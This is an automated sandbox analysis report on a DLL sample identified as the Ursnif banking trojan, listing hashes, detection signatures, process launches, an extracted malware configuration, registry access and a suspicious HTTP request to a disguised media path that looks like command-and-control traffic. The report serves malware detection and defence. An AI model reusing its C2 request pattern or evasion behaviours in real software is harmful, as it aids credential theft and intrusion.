Play interactive tour

Edit tour

Analysis Report 0pz1on1.dll

Overview

General Information

Sample Name:	0pz1on1.dll
Analysis ID:	320322
MD5:	b1a199b3bd47cb4af5a75328c0a8ed36
SHA1:	c134eb3ba368cf6cef5c1dfa47b36fd68cc63a5e
SHA256:	2900169349643be6f77530141614eeac56e7b22387b9acf866ed4e4922e32401
Tags:	dllgoziisfbursnif
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Creates a COM Internet Explorer object

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6628 cmdline: loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll' MD5: 62442CB29236B024E992A556DA72B97A)

regsvr32.exe (PID: 6644 cmdline: regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 6652 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 6672 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 7052 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4596 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "250162", "uptime": "155ceL", "crc": "1", "id": "7238", "user": "c2868f8f08f8d2d8cdc8873a2ec7164b", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 6644	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.6644.2.memstr	Malware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "155ceL", "crc": "1", "id": "7238", "user": "c2868f8f08f8d2d8cdc8873a2ec7164b", "soft": "3"}
Source: regsvr32.exe.6644.2.memstr	Malware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "155ceL", "crc": "1", "id": "7238", "user": "c2868f8f08f8d2d8cdc8873a2ec7164b", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: 0pz1on1.dll	ReversingLabs: Detection: 12%
Source: 0pz1on1.dll	ReversingLabs: Detection: 12%

Machine Learning detection for sample

Show sources

Source: 0pz1on1.dll	Joe Sandbox ML: detected
Source: 0pz1on1.dll	Joe Sandbox ML: detected

Source: 2.2.regsvr32.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.regsvr32.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_044B523B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_044B523B

Networking:

Creates a COM Internet Explorer object

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /images/ImwSfQzek0TH1PjPRN/U0Aq1rFKx/emeJW4LJI8wrM6MN4_2B/qJPnb8B3BkpX2XpdE2G/V316Jgdov_2BOgw86dBUYu/kkLtVneyvgFhX/UiMN5NKO/xM6hmwPnY5DiFEO8xhkgOsY/OSDkw0Qs/kJpX3kaA4Hvk7/3.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/ImwSfQzek0TH1PjPRN/U0Aq1rFKx/emeJW4LJI8wrM6MN4_2B/qJPnb8B3BkpX2XpdE2G/V316Jgdov_2BOgw86dBUYu/kkLtVneyvgFhX/UiMN5NKO/xM6hmwPnY5DiFEO8xhkgOsY/OSDkw0Qs/kJpX3kaA4Hvk7/3.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive

Source: de-ch[1].htm.5.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: de-ch[1].htm.5.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
Source: de-ch[1].htm.5.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: de-ch[1].htm.5.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.5.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown	DNS traffic detected: queries for: www.msn.com
Source: unknown	DNS traffic detected: queries for: www.msn.com

Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 0pz1on1.dll	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.5.dr	String found in binary or memory: http://popup.taboola.com/german
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://amzn.to/2TTxhNg
